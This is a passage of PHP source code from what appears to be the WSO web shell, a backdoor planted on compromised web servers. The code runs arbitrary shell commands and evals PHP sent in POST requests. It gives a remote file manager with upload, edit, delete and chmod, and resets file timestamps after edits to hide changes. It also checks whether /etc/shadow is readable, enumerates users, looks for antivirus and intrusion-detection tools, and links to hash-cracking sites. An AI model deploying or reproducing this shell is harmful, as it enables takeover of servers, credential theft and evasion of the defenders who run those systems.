type=text name=c value=''><input type=submit value='>>'></form></td>\n\t\t\t<td><form method='post' ENCTYPE='multipart/form-data'>\n\t\t\t<input type=hidden name=a value='ff_man'>\n\t\t\t<input type=hidden name=c value='" . $GLOBALS['cwd'] . "'>\n\t\t\t<input type=hidden name=p1 value='uploadFile'>\n\t\t\t<input type=hidden name=charset value='" . (isset($_POST['charset']) ? $_POST['charset'] : '') . "'>\n\t\t\t<span>Upload file:</span>{$is_writable}<br><input class='tools_inp_area' type=file name=f><input type=submit value='>>'></form><br ></td>\n\t\t</tr></table></div></body></html>";
}
if (!function_exists("posix_getpwuid") && strpos($GLOBALS['disable_functions'], 'posix_getpwuid') === false) {
function posix_getpwuid($p)
{
return false;
}
}
if (!function_exists("posix_getgrgid") && strpos($GLOBALS['disable_functions'], 'posix_getgrgid') === false) {
function posix_getgrgid($p)
{
return false;
}
}
function wsoEx($in)
{
$out = '';
if (function_exists('exec')) {
@exec($in, $out);
$out = @join("\n", $out);
} elseif (function_exists('passthru')) {
ob_start();
@passthru($in);
$out = ob_get_clean();
} elseif (function_exists('system')) {
ob_start();
@system($in);
$out = ob_get_clean();
} elseif (function_exists('shell_exec')) {
$out = shell_exec($in);
} elseif (is_resource($f = @popen($in, "r"))) {
$out = "";
while (!@feof($f)) {
$out .= fread($f, 1024);
}
pclose($f);
}
return $out;
}
function wsoViewSize($s)
{
if (is_int($s)) {
$s = sprintf("%u", $s);
}
if ($s >= 1073741824) {
return sprintf('%1.2f', $s / 1073741824) . ' GB';
} elseif ($s >= 1048576) {
return sprintf('%1.2f', $s / 1048576) . ' MB';
} elseif ($s >= 1024) {
return sprintf('%1.2f', $s / 1024) . ' KB';
} else {
return $s . ' B';
}
}
function wsoPerms($p)
{
if (($p & 0xc000) == 0xc000) {
$i = 's';
} elseif (($p & 0xa000) == 0xa000) {
$i = 'l';
} elseif (($p & 0x8000) == 0x8000) {
$i = '-';
} elseif (($p & 0x6000) == 0x6000) {
$i = 'b';
} elseif (($p & 0x4000) == 0x4000) {
$i = 'd';
} elseif (($p & 0x2000) == 0x2000) {
$i = 'c';
} elseif (($p & 0x1000) == 0x1000) {
$i = 'p';
} else {
$i = 'u';
}
$i .= $p & 0x100 ? 'r' : '-';
$i .= $p & 0x80 ? 'w' : '-';
$i .= $p & 0x40 ? $p & 0x800 ? 's' : 'x' : ($p & 0x800 ? 'S' : '-');
$i .= $p & 0x20 ? 'r' : '-';
$i .= $p & 0x10 ? 'w' : '-';
$i .= $p & 0x8 ? $p & 0x400 ? 's' : 'x' : ($p & 0x400 ? 'S' : '-');
$i .= $p & 0x4 ? 'r' : '-';
$i .= $p & 0x2 ? 'w' : '-';
$i .= $p & 0x1 ? $p & 0x200 ? 't' : 'x' : ($p & 0x200 ? 'T' : '-');
return $i;
}
function wsoPermsColor($f)
{
if (!@is_readable($f)) {
return '<font color=#FF0000>' . wsoPerms(@fileperms($f)) . '</font>';
} elseif (!@is_writable($f)) {
return '<font color=white>' . wsoPerms(@fileperms($f)) . '</font>';
} else {
return '<font color=#25ff00>' . wsoPerms(@fileperms($f)) . '</font>';
}
}
function wsoScandir($dir)
{
if (function_exists("scandir")) {
return scandir($dir);
} else {
$dh = opendir($dir);
while (false !== ($filename = readdir($dh))) {
$files[] = $filename;
}
return $files;
}
}
function wsoWhich($p)
{
$path = wsoEx('which ' . $p);
if (!empty($path)) {
return $path;
}
return false;
}
function actionSecInfo()
{
wsoHeader();
echo "<h1>Server security information</h1><div class=content>";
function wsoSecParam($n, $v)
{
$v = trim($v);
if ($v) {
echo '<span>' . $n . ': </span>';
if (strpos($v, "\n") === false) {
echo $v . '<br>';
} else {
echo '<pre class=ml_one_area>' . $v . '</pre>';
}
}
}
wsoSecParam('Server software', @getenv('SERVER_SOFTWARE'));
if (function_exists('apache_get_modules')) {
wsoSecParam('Loaded Apache modules', implode(', ', apache_get_modules()));
}
wsoSecParam('Disabled PHP Functions', $GLOBALS['disable_functions'] ? $GLOBALS['disable_functions'] : 'none');
wsoSecParam('Open base dir', @ini_get('open_basedir'));
wsoSecParam('Safe mode exec dir', @ini_get('safe_mode_exec_dir'));
wsoSecParam('Safe mode include dir', @ini_get('safe_mode_include_dir'));
wsoSecParam('cURL support', function_exists('curl_version') ? 'enabled' : 'no');
$temp = array();
if (function_exists('mysql_get_client_info')) {
$temp[] = "MySql (" . mysql_get_client_info() . ")";
}
if (function_exists('mssql_connect')) {
$temp[] = "MSSQL";
}
if (function_exists('pg_connect')) {
$temp[] = "PostgreSQL";
}
if (function_exists('oci_connect')) {
$temp[] = "Oracle";
}
wsoSecParam('Supported databases', implode(', ', $temp));
echo "<br>";
if ($GLOBALS['os'] == 'nix') {
wsoSecParam('Readable /etc/passwd', @is_readable('/etc/passwd') ? "yes <a href='#' onclick='g(\"ff_tools\", \"/etc/\", \"passwd\")'>[view]</a>" : 'no');
wsoSecParam('Readable /etc/shadow', @is_readable('/etc/shadow') ? "yes <a href='#' onclick='g(\"ff_tools\", \"/etc/\", \"shadow\")'>[view]</a>" : 'no');
wsoSecParam('OS version', @file_get_contents('/proc/version'));
wsoSecParam('Distr name', @file_get_contents('/etc/issue.net'));
if (!$GLOBALS['safe_mode']) {
$userful = array('gcc', 'lcc', 'cc', 'ld', 'make', 'php', 'perl', 'python', 'ruby', 'tar', 'gzip', 'bzip', 'bzip2', 'nc', 'locate', 'suidperl');
$danger = array('kav', 'nod32', 'bdcored', 'uvscan', 'sav', 'drwebd', 'clamd', 'rkhunter', 'chkrootkit', 'iptables', 'ipfw', 'tripwire', 'shieldcc', 'portsentry', 'snort', 'ossec', 'lidsadm', 'tcplodg', 'sxid', 'logcheck', 'logwatch', 'sysmask', 'zmbscap', 'sawmill', 'wormscan', 'ninja');
$downloaders = array('wget', 'fetch', 'lynx', 'links', 'curl', 'get', 'lwp-mirror');
echo "<br>";
$temp = array();
foreach ($userful as $item) {
if (wsoWhich($item)) {
$temp[] = $item;
}
}
wsoSecParam('Userful', implode(', ', $temp));
$temp = array();
foreach ($danger as $item) {
if (wsoWhich($item)) {
$temp[] = $item;
}
}
wsoSecParam('Danger', implode(', ', $temp));
$temp = array();
foreach ($downloaders as $item) {
if (wsoWhich($item)) {
$temp[] = $item;
}
}
wsoSecParam('Downloaders', implode(', ', $temp));
echo "<br/>";
wsoSecParam('HDD space', wsoEx('df -h'));
wsoSecParam('Hosts', @file_get_contents('/etc/hosts'));
echo "<br/><span>posix_getpwuid (\"Read\" /etc/passwd)</span><table><form onsubmit='g(null,null,\"5\",this.param1.value,this.param2.value);return false;'><tr><td>From</td><td><input type=text name=param1 value=0></td></tr><tr><td>To</td><td><input type=text name=param2 value=1000></td></tr></table><input type=submit value=\">>\"></form>";
if (isset($_POST['p2'], $_POST['p3']) && is_numeric($_POST['p2']) && is_numeric($_POST['p3'])) {
$temp = "";
for (; $_POST['p2'] <= $_POST['p3']; $_POST['p2']++) {
$uid = @posix_getpwuid($_POST['p2']);
if ($uid) {
$temp .= join(':', $uid) . "\n";
}
}
echo "<br/>";
wsoSecParam('Users', $temp);
}
}
} else {
wsoSecParam('OS Version', wsoEx('ver'));
wsoSecParam('Account Settings', wsoEx('net accounts'));
wsoSecParam('User Accounts', wsoEx('net user'));
}
echo "</div>";
wsoFooter();
}
function actionPhp()
{
if (isset($_POST['ajax'])) {
WSOsetcookie(md5($_SERVER['HTTP_HOST']) . 'ajax', true);
ob_start();
eval($_POST['p1']);
$temp = "document.getElementById('PhpOutput').style.display='';document.getElementById('PhpOutput').innerHTML='" . addcslashes(htmlspecialchars(ob_get_clean()), "\n\r\t\\'\x00") . "';\n";
echo strlen($temp), "\n", $temp;
exit;
}
if (empty($_POST['ajax']) && !empty($_POST['p1'])) {
WSOsetcookie(md5($_SERVER['HTTP_HOST']) . 'ajax', 0);
}
wsoHeader();
if (isset($_POST['p2']) && $_POST['p2'] == 'info') {
echo "<h1>PHP info</h1><div class=content><style>.p {color:#000;}</style>";
ob_start();
phpinfo();
$tmp = ob_get_clean();
$tmp = preg_replace(array('!(body|a:\\w+|body, td, th, h1, h2) {.*}!msiU', '!td, th {(.*)}!msiU', '!<img[^>]+>!msiU'), array('', '.e, .v, .h, .h th {$1}', ''), $tmp);
echo str_replace('<h1', '<h2', $tmp) . '</div><br>';
}
echo '<h1>Execution PHP-code</h1><div class=content><form name=pf method=post onsubmit="if(this.ajax.checked){a(\'Php\',null,this.code.value);}else{g(\'Php\',null,this.code.value,\'\');}return false;"><textarea name=code class=area_main id=PhpCode>' . (!empty($_POST['p1']) ? htmlspecialchars($_POST['p1']) : '') . '</textarea><input type=submit value=Eval style="margin-top:5px">';
echo ' <input type=checkbox name=ajax value=1 ' . ($_COOKIE[md5($_SERVER['HTTP_HOST']) . 'ajax'] ? 'checked' : '') . '> send using AJAX</form><pre id=PhpOutput style="' . (empty($_POST['p1']) ? 'display:none;' : '') . 'margin-top:5px;" class=ml_one_area>';
if (!empty($_POST['p1'])) {
ob_start();
eval($_POST['p1']);
echo htmlspecialchars(ob_get_clean());
}
echo "</pre></div>";
wsoFooter();
}
function actionff_man()
{
if (!empty($_COOKIE['f'])) {
$_COOKIE['f'] = @unserialize($_COOKIE['f']);
}
if (!empty($_POST['p1'])) {
switch ($_POST['p1']) {
case 'uploadFile':
if (!@move_uploaded_file($_FILES['f']['tmp_name'], $_FILES['f']['name'])) {
echo "Can't upload file!";
}
break;
case 'mkdir':
if (!@mkdir($_POST['p2'])) {
echo "Can't create new dir";
}
break;
case 'delete':
function deleteDir($path)
{
$path = substr($path, -1) == '/' ? $path : $path . '/';
$dh = opendir($path);
while (($item = readdir($dh)) !== false) {
$item = $path . $item;
if (basename($item) == ".." || basename($item) == ".") {
continue;
}
$type = filetype($item);
if ($type == "dir") {
deleteDir($item);
} else {
@unlink($item);
}
}
closedir($dh);
@rmdir($path);
}
if (is_array(@$_POST['f'])) {
foreach ($_POST['f'] as $f) {
if ($f == '..') {
continue;
}
$f = urldecode($f);
if (is_dir($f)) {
deleteDir($f);
} else {
@unlink($f);
}
}
}
break;
case 'paste':
if ($_COOKIE['act'] == 'copy') {
function copy_paste($c, $s, $d)
{
if (is_dir($c . $s)) {
mkdir($d . $s);
$h = @opendir($c . $s);
while (($f = @readdir($h)) !== false) {
if ($f != "." and $f != "..") {
copy_paste($c . $s . '/', $f, $d . $s . '/');
}
}
} elseif (is_file($c . $s)) {
@copy($c . $s, $d . $s);
}
}
foreach ($_COOKIE['f'] as $f) {
copy_paste($_COOKIE['c'], $f, $GLOBALS['cwd']);
}
} elseif ($_COOKIE['act'] == 'move') {
function move_paste($c, $s, $d)
{
if (is_dir($c . $s)) {
mkdir($d . $s);
$h = @opendir($c . $s);
while (($f = @readdir($h)) !== false) {
if ($f != "." and $f != "..") {
copy_paste($c . $s . '/', $f, $d . $s . '/');
}
}
} elseif (@is_file($c . $s)) {
@copy($c . $s, $d . $s);
}
}
foreach ($_COOKIE['f'] as $f) {
@rename($_COOKIE['c'] . $f, $GLOBALS['cwd'] . $f);
}
} elseif ($_COOKIE['act'] == 'zip') {
if (class_exists('ZipArchive')) {
$zip = new ZipArchive();
if ($zip->open($_POST['p2'], 1)) {
chdir($_COOKIE['c']);
foreach ($_COOKIE['f'] as $f) {
if ($f == '..') {
continue;
}
if (@is_file($_COOKIE['c'] . $f)) {
$zip->addFile($_COOKIE['c'] . $f, $f);
} elseif (@is_dir($_COOKIE['c'] . $f)) {
$iterator = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($f . '/', FilesystemIterator::SKIP_DOTS));
foreach ($iterator as $key => $value) {
$zip->addFile(realpath($key), $key);
}
}
}
chdir($GLOBALS['cwd']);
$zip->close();
}
}
} elseif ($_COOKIE['act'] == 'unzip') {
if (class_exists('ZipArchive')) {
$zip = new ZipArchive();
foreach ($_COOKIE['f'] as $f) {
if ($zip->open($_COOKIE['c'] . $f)) {
$zip->extractTo($GLOBALS['cwd']);
$zip->close();
}
}
}
} elseif ($_COOKIE['act'] == 'tar') {
chdir($_COOKIE['c']);
$_COOKIE['f'] = array_map('escapeshellarg', $_COOKIE['f']);
wsoEx('tar cfzv ' . escapeshellarg($_POST['p2']) . ' ' . implode(' ', $_COOKIE['f']));
chdir($GLOBALS['cwd']);
}
unset($_COOKIE['f']);
setcookie('f', '', time() - 3600);
break;
default:
if (!empty($_POST['p1'])) {
WSOsetcookie('act', $_POST['p1']);
WSOsetcookie('f', serialize(@$_POST['f']));
WSOsetcookie('c', @$_POST['c']);
}
break;
}
}
wsoHeader();
echo "<h1>File manager</h1><div class=content><script>p1_=p2_=p3_=\"\";</script>";
$dirContent = wsoScandir(isset($_POST['c']) ? $_POST['c'] : $GLOBALS['cwd']);
if ($dirContent === false) {
echo "Can't open this folder!";
wsoFooter();
return;
}
global $sort;
$sort = array('name', 1);
if (!empty($_POST['p1'])) {
if (preg_match('!s_([A-z]+)_(\\d{1})!', $_POST['p1'], $match)) {
$sort = array($match[1], (int) $match[2]);
}
}
echo "<script>\n\t\tfunction sa() {\n\t\t\tfor(i=0;i<d.files.elements.length;i++)\n\t\t\t\tif(d.files.elements[i].type == 'checkbox')\n\t\t\t\t\td.files.elements[i].checked = d.files.elements[0].checked;\n\t\t}\n\t</script>\n\t<table width='100%' class='main' cellspacing='0' cellpadding='2'>\n\t<form name=files method=post><tr><th width='13px'><input type=checkbox onclick='sa()' class=chkbx></th><th><a href='#' onclick='g(\"ff_man\",null,\"s_name_" . ($sort[1] ? 0 : 1) . "\")'>Name</a></th><th><a href='#' onclick='g(\"ff_man\",null,\"s_size_" . ($sort[1] ? 0 : 1) . "\")'>Size</a></th><th><a href='#' onclick='g(\"ff_man\",null,\"s_modify_" . ($sort[1] ? 0 : 1) . "\")'>Modify</a></th><th>Owner/Group</th><th><a href='#' onclick='g(\"ff_man\",null,\"s_perms_" . ($sort[1] ? 0 : 1) . "\")'>Permissions</a></th><th>Actions</th></tr>";
$dirs = $files = array();
$n = count($dirContent);
for ($i = 0; $i < $n; $i++) {
$ow = @posix_getpwuid(@fileowner($dirContent[$i]));
$gr = @posix_getgrgid(@filegroup($dirContent[$i]));
$tmp = array('name' => $dirContent[$i], 'path' => $GLOBALS['cwd'] . $dirContent[$i], 'modify' => date('Y-m-d H:i:s', @filemtime($GLOBALS['cwd'] . $dirContent[$i])), 'perms' => wsoPermsColor($GLOBALS['cwd'] . $dirContent[$i]), 'size' => @filesize($GLOBALS['cwd'] . $dirContent[$i]), 'owner' => $ow['name'] ? $ow['name'] : @fileowner($dirContent[$i]), 'group' => $gr['name'] ? $gr['name'] : @filegroup($dirContent[$i]));
if (@is_file($GLOBALS['cwd'] . $dirContent[$i])) {
$files[] = array_merge($tmp, array('type' => 'file'));
} elseif (@is_link($GLOBALS['cwd'] . $dirContent[$i])) {
$dirs[] = array_merge($tmp, array('type' => 'link', 'link' => readlink($tmp['path'])));
} elseif (@is_dir($GLOBALS['cwd'] . $dirContent[$i])) {
$dirs[] = array_merge($tmp, array('type' => 'dir'));
}
}
$GLOBALS['sort'] = $sort;
function wsoCmp($a, $b)
{
if ($GLOBALS['sort'][0] != 'size') {
return strcmp(strtolower($a[$GLOBALS['sort'][0]]), strtolower($b[$GLOBALS['sort'][0]])) * ($GLOBALS['sort'][1] ? 1 : -1);
} else {
return ($a['size'] < $b['size'] ? -1 : 1) * ($GLOBALS['sort'][1] ? 1 : -1);
}
}
usort($files, "wsoCmp");
usort($dirs, "wsoCmp");
$files = array_merge($dirs, $files);
$l = 0;
foreach ($files as $f) {
echo '<tr' . ($l ? ' class=l_one_area' : '') . '><td><input type=checkbox name="f[]" value="' . urlencode($f['name']) . '" class=chkbx></td><td><a href=# onclick="' . ($f['type'] == 'file' ? 'g(\'ff_tools\',null,\'' . urlencode($f['name']) . '\', \'view\')">' . htmlspecialchars($f['name']) : 'g(\'ff_man\',\'' . $f['path'] . '\');" ' . (empty($f['link']) ? '' : "title='{$f['link']}'") . '><b>[ ' . htmlspecialchars($f['name']) . ' ]</b>') . '</a></td><td>' . ($f['type'] == 'file' ? wsoViewSize($f['size']) : $f['type']) . '</td><td>' . $f['modify'] . '</td><td>' . $f['owner'] . '/' . $f['group'] . '</td><td><a href=# onclick="g(\'ff_tools\',null,\'' . urlencode($f['name']) . '\',\'chmod\')">' . $f['perms'] . '</td><td><a href="#" onclick="g(\'ff_tools\',null,\'' . urlencode($f['name']) . '\', \'rename\')">R</a> <a href="#" onclick="g(\'ff_tools\',null,\'' . urlencode($f['name']) . '\', \'touch\')">T</a>' . ($f['type'] == 'file' ? ' <a href="#" onclick="g(\'ff_tools\',null,\'' . urlencode($f['name']) . '\', \'edit\')">E</a> <a href="#" onclick="g(\'ff_tools\',null,\'' . urlencode($f['name']) . '\', \'download\')">D</a>' : '') . '</td></tr>';
$l = $l ? 0 : 1;
}
echo "<tr><td colspan=7>\n\t\t<input type=hidden name=a value='ff_man'>\n\t\t<input type=hidden name=c value='" . htmlspecialchars($GLOBALS['cwd']) . "'>\n\t\t<input type=hidden name=charset value='" . (isset($_POST['charset']) ? $_POST['charset'] : '') . "'>\n\t\t<select name='p1'><option value='copy'>Copy</option><option value='move'>Move</option><option value='delete'>Delete</option>";
if (class_exists('ZipArchive')) {
echo "<option value='zip'>Compress (zip)</option><option value='unzip'>Uncompress (zip)</option>";
}
echo "<option value='tar'>Compress (tar.gz)</option>";
if (!empty($_COOKIE['act']) && @count($_COOKIE['f'])) {
echo "<option value='paste'>Paste / Compress</option>";
}
echo "</select> ";
if (!empty($_COOKIE['act']) && @count($_COOKIE['f']) && ($_COOKIE['act'] == 'zip' || $_COOKIE['act'] == 'tar')) {
echo "file name: <input type=text name=p2 value='wso_" . date("Ymd_His") . "." . ($_COOKIE['act'] == 'zip' ? 'zip' : 'tar.gz') . "'> ";
}
echo "<input type='submit' value='>>'></td></tr></form></table></div>";
wsoFooter();
}
function actionStringTools()
{
if (!function_exists('hex2bin')) {
function hex2bin($p)
{
return decbin(hexdec($p));
}
}
if (!function_exists('binhex')) {
function binhex($p)
{
return dechex(bindec($p));
}
}
if (!function_exists('hex2ascii')) {
function hex2ascii($p)
{
$r = '';
for ($i = 0; $i < strLen($p); $i += 2) {
$r .= chr(hexdec($p[$i] . $p[$i + 1]));
}
return $r;
}
}
if (!function_exists('ascii2hex')) {
function ascii2hex($p)
{
$r = '';
for ($i = 0; $i < strlen($p); ++$i) {
$r .= sprintf('%02X', ord($p[$i]));
}
return strtoupper($r);
}
}
if (!function_exists('full_urlencode')) {
function full_urlencode($p)
{
$r = '';
for ($i = 0; $i < strlen($p); ++$i) {
$r .= '%' . dechex(ord($p[$i]));
}
return strtoupper($r);
}
}
$stringTools = array('Base64 encode' => 'base64_encode', 'Base64 decode' => 'base64_decode', 'Url encode' => 'urlencode', 'Url decode' => 'urldecode', 'Full urlencode' => 'full_urlencode', 'md5 hash' => 'md5', 'sha1 hash' => 'sha1', 'crypt' => 'crypt', 'CRC32' => 'crc32', 'ASCII to HEX' => 'ascii2hex', 'HEX to ASCII' => 'hex2ascii', 'HEX to DEC' => 'hexdec', 'HEX to BIN' => 'hex2bin', 'DEC to HEX' => 'dechex', 'DEC to BIN' => 'decbin', 'BIN to HEX' => 'binhex', 'BIN to DEC' => 'bindec', 'String to lower case' => 'strtolower', 'String to upper case' => 'strtoupper', 'Htmlspecialchars' => 'htmlspecialchars', 'String length' => 'strlen');
if (isset($_POST['ajax'])) {
WSOsetcookie(md5($_SERVER['HTTP_HOST']) . 'ajax', true);
ob_start();
if (in_array($_POST['p1'], $stringTools)) {
echo $_POST['p1']($_POST['p2']);
}
$temp = "document.getElementById('strOutput').style.display='';document.getElementById('strOutput').innerHTML='" . addcslashes(htmlspecialchars(ob_get_clean()), "\n\r\t\\'\x00") . "';\n";
echo strlen($temp), "\n", $temp;
exit;
}
if (empty($_POST['ajax']) && !empty($_POST['p1'])) {
WSOsetcookie(md5($_SERVER['HTTP_HOST']) . 'ajax', 0);
}
wsoHeader();
echo "<h1>String conversions</h1><div class=content>";
echo "<form name='toolsForm' onSubmit='if(this.ajax.checked){a(null,null,this.selectTool.value,this.input.value);}else{g(null,null,this.selectTool.value,this.input.value);} return false;'><select name='selectTool'>";
foreach ($stringTools as $k => $v) {
echo "<option value='" . htmlspecialchars($v) . "'>" . $k . "</option>";
}
echo "</select><input type='submit' value='>>'/> <input type=checkbox name=ajax value=1 " . (@$_COOKIE[md5($_SERVER['HTTP_HOST']) . 'ajax'] ? 'checked' : '') . "> send using AJAX<br><textarea name='input' style='margin-top:5px' class=area_main>" . (empty($_POST['p1']) ? '' : htmlspecialchars(@$_POST['p2'])) . "</textarea></form><pre class='ml_one_area' style='" . (empty($_POST['p1']) ? 'display:none;' : '') . "margin-top:5px' id='strOutput'>";
if (!empty($_POST['p1'])) {
if (in_array($_POST['p1'], $stringTools)) {
echo htmlspecialchars($_POST['p1']($_POST['p2']));
}
}
echo "</pre></div><br><h1>Search files:</h1><div class=content>\n\t\t\t<form onsubmit=\"g(null,this.cwd.value,null,this.text.value,this.filename.value);return false;\"><table cellpadding='1' cellspacing='0' width='50%'>\n\t\t\t\t<tr><td width='1%'>Text:</td><td><input type='text' name='text' style='width:100%'></td></tr>\n\t\t\t\t<tr><td>Path:</td><td><input type='text' name='cwd' value='" . htmlspecialchars($GLOBALS['cwd']) . "' style='width:100%'></td></tr>\n\t\t\t\t<tr><td>Name:</td><td><input type='text' name='filename' value='*' style='width:100%'></td></tr>\n\t\t\t\t<tr><td></td><td><input type='submit' value='>>'></td></tr>\n\t\t\t\t</table></form>";
function wsoRecursiveGlob($path)
{
if (substr($path, -1) != '/') {
$path .= '/';
}
$paths = @array_unique(@array_merge(@glob($path . $_POST['p3']), @glob($path . '*', GLOB_ONLYDIR)));
if (is_array($paths) && @count($paths)) {
foreach ($paths as $item) {
if (@is_dir($item)) {
if ($path != $item) {
wsoRecursiveGlob($item);
}
} else {
if (empty($_POST['p2']) || @strpos(file_get_contents($item), $_POST['p2']) !== false) {
echo "<a href='#' onclick='g(\"ff_tools\",null,\"" . urlencode($item) . "\", \"view\",\"\")'>" . htmlspecialchars($item) . "</a><br>";
}
}
}
}
}
if (@$_POST['p3']) {
wsoRecursiveGlob($_POST['c']);
}
echo "</div><br><h1>Search for hash:</h1><div class=content>\n\t\t\t<form method='post' target='_blank' name='hf'>\n\t\t\t\t<input type='text' name='hash' style='width:200px;'><br>\n\t <input type='hidden' name='act' value='find'/>\n\t\t\t\t<input type='button' value='hashcracking.ru' onclick=\"document.hf.action='https://hashcracking.ru/index.php';document.hf.submit()\"><br>\n\t\t\t\t<input type='button' value='md5.rednoize.com' onclick=\"document.hf.action='http://md5.rednoize.com/?q='+document.hf.hash.value+'&s=md5';document.hf.submit()\"><br>\n\t <input type='button' value='crackfor.me' onclick=\"document.hf.action='http://crackfor.me/index.php';document.hf.submit()\"><br>\n\t\t\t</form></div>";
wsoFooter();
}
function actionff_tools()
{
if (isset($_POST['p1'])) {
$_POST['p1'] = urldecode($_POST['p1']);
}
if (@$_POST['p2'] == 'download') {
if (@is_file($_POST['p1']) && @is_readable($_POST['p1'])) {
ob_start("ob_gzhandler", 4096);
header("Content-Disposition: attachment; filename=" . basename($_POST['p1']));
if (function_exists("mime_content_type")) {
$type = @mime_content_type($_POST['p1']);
header("Content-Type: " . $type);
} else {
header("Content-Type: application/octet-stream");
}
$fp = @fopen($_POST['p1'], "r");
if ($fp) {
while (!@feof($fp)) {
echo @fread($fp, 1024);
}
fclose($fp);
}
}
exit;
}
if (@$_POST['p2'] == 'mkfile') {
if (!file_exists($_POST['p1'])) {
$fp = @fopen($_POST['p1'], 'w');
if ($fp) {
$_POST['p2'] = "edit";
fclose($fp);
}
}
}
wsoHeader();
echo "<h1>File tools</h1><div class=content>";
if (!file_exists(@$_POST['p1'])) {
echo "File not exists";
wsoFooter();
return;
}
$uid = @posix_getpwuid(@fileowner($_POST['p1']));
if (!$uid) {
$uid['name'] = @fileowner($_POST['p1']);
$gid['name'] = @filegroup($_POST['p1']);
} else {
$gid = @posix_getgrgid(@filegroup($_POST['p1']));
}
echo '<span>Name:</span> ' . htmlspecialchars(@basename($_POST['p1'])) . ' <span>Size:</span> ' . (is_file($_POST['p1']) ? wsoViewSize(filesize($_POST['p1'])) : '-') . ' <span>Permission:</span> ' . wsoPermsColor($_POST['p1']) . ' <span>Owner/Group:</span> ' . $uid['name'] . '/' . $gid['name'] . '<br>';
echo '<span>Change time:</span> ' . date('Y-m-d H:i:s', filectime($_POST['p1'])) . ' <span>Access time:</span> ' . date('Y-m-d H:i:s', fileatime($_POST['p1'])) . ' <span>Modify time:</span> ' . date('Y-m-d H:i:s', filemtime($_POST['p1'])) . '<br><br>';
if (empty($_POST['p2'])) {
$_POST['p2'] = 'view';
}
if (is_file($_POST['p1'])) {
$m = array('View', 'Highlight', 'Download', 'Hexdump', 'Edit', 'Chmod', 'Rename', 'Touch');
} else {
$m = array('Chmod', 'Rename', 'Touch');
}
foreach ($m as $v) {
echo '<a href=# onclick="g(null,null,\'' . urlencode($_POST['p1']) . '\',\'' . strtolower($v) . '\')">' . (strtolower($v) == @$_POST['p2'] ? '<b>[ ' . $v . ' ]</b>' : $v) . '</a> ';
}
echo "<br><br>";
switch ($_POST['p2']) {
case 'view':
echo "<pre class=ml_one_area>";
$fp = @fopen($_POST['p1'], 'r');
if ($fp) {
while (!@feof($fp)) {
echo htmlspecialchars(@fread($fp, 1024));
}
@fclose($fp);
}
echo "</pre>";
break;
case 'highlight':
if (@is_readable($_POST['p1'])) {
echo "<div class=ml_one_area style=\"background-color: #e1e1e1;color:black;\">";
$code = @highlight_file($_POST['p1'], true);
echo str_replace(array('<span ', '</span>'), array('<font ', '</font>'), $code) . '</div>';
}
break;
case 'chmod':
if (!empty($_POST['p3'])) {
$perms = 0;
for ($i = strlen($_POST['p3']) - 1; $i >= 0; --$i) {
$perms += (int) $_POST['p3'][$i] * pow(8, strlen($_POST['p3']) - $i - 1);
}
if (!@chmod($_POST['p1'], $perms)) {
echo "Can't set permissions!<br><script>document.mf.p3.value=\"\";</script>";
}
}
clearstatcache();
echo '<script>p3_="";</script><form onsubmit="g(null,null,\'' . urlencode($_POST['p1']) . '\',null,this.chmod.value);return false;"><input type=text name=chmod value="' . substr(sprintf('%o', fileperms($_POST['p1'])), -4) . '"><input type=submit value=">>"></form>';
break;
case 'edit':
if (!is_writable($_POST['p1'])) {
echo "File isn't wr-le";
break;
}
if (!empty($_POST['p3'])) {
$time = @filemtime($_POST['p1']);
$_POST['p3'] = substr($_POST['p3'], 1);
$fp = @fopen($_POST['p1'], "w");
if ($fp) {
@fwrite($fp, $_POST['p3']);
@fclose($fp);
echo "Saved!<br><script>p3_=\"\";</script>";
@touch($_POST['p1'], $time, $time);
}
}
echo '<form onsubmit="g(null,null,\'' . urlencode($_POST['p1']) . '\',null,\'1\'+this.text.value);return false;"><textarea name=text class=area_main>';
$fp = @fopen($_POST['p1'], 'r');
if ($fp) {
while (!@feof($fp)) {
echo htmlspecialchars(@fread($fp, 1024));
}
@fclose($fp);
}
echo "</textarea><input type=submit value=\">>\"></form>";
break;
case 'hexdump':
$c = @file_get_contents($_POST['p1']);
$n = 0;
$h = array('00000000<br>', '', '');
$len = strlen($c);
for ($i = 0; $i < $len; ++$i) {
$h[1] .= sprintf('%02X', ord($c[$i])) . ' ';
switch (ord($c[$i])) {
case 0:
$h[2] .= ' ';
break;
case 9:
$h[2] .= ' ';
break;
case 10:
$h[2] .= ' ';
break;
case 13:
$h[2] .= ' ';
break;
default:
$h[2] .= $c[$i];
break;
}
$n++;
if ($n == 32) {
$n = 0;
if ($i + 1 < $len) {
$h[0] .= sprintf('%08X', $i + 1) . '<br>';
}
$h[1] .= '<br>';
$h[2] .= "\n";
}
}
echo '<table cellspacing=1 cellpadding=5 bgcolor=#222222><tr><td bgcolor=#333333><span style="font-weight: normal;"><pre>' . $h[0] . '</pre></span></td><td bgcolor=#282828><pre>' . $h[1] . '</pre></td><td bgcolor=#333333><pre>' . htmlspecialchars($h[2]) . '</pre></td></tr></table>';
break;
case 'rename':
if (!empty($_POST['p3'])) {
if (!@rename($_POST['p1'], $_POST['p3'])) {
echo "Can't rename!<br>";
} else {
die('<script>g(null,null,"' . urlencode($_POST['p3']) . '",null,"")</script>');
}
}
echo '<form onsubmit="g(null,null,\'' . urlencode($_POST['p1']) . '\',null,this.name.value);return false;"><input type=text name=name value="' . htmlspecialchars($_POST['p1']) . '"><input type=submit value=">>"></form>';
break;
case 'touch':
if (!empty($_POST['p3'])) {
$time = strtotime($_POST['p3']);
if ($time) {
if (!touch($_POST['p1'], $time, $time)) {
echo "Fail!";
} else {
echo "Touched!";
}
} else {
echo "Bad time format!";
}
}
clearstatcache();
echo '<script>p3_="";</script><form onsubmit="g(null,null,\'' . urlencode($_POST['p1']) . '\',null,this.touch.value);return false;"><input type=text name=touch value="' . date("Y-m-d H:i:s", @filemtime($_POST['p1'])) . '"><input type=submit value=">>"></form>';
break;
}
echo "</div>";
wsoFooter();
}
function actionConsole()
{
if (!empty($_POST['p1']) && !empty($_POST['p2'])) {
WSOsetcookie(md5($_SERVER['HTTP_HOST']) . 'stderr_to_out', true);
$_POST['p1'] .= ' 2>&1';
} elseif (!empty($_POST['p1'])) {
WSOsetcookie(md5($_SERVER['HTTP_HOST']) . 'stderr_to_out', 0);
}
if (isset($_POST['ajax'])) {
WSOsetcookie(md5($_SERVER['HTTP_HOST']) . 'ajax', true);
ob_start();
echo "d.cf.cmd.value='';\n";
$temp = @iconv($_POST['charset'], 'UTF-8', addcslashes("\n\$ " . $_POST['p1'] . "\n" . wsoEx($_POST['p1']), "\n\r\t\\'\x00"));
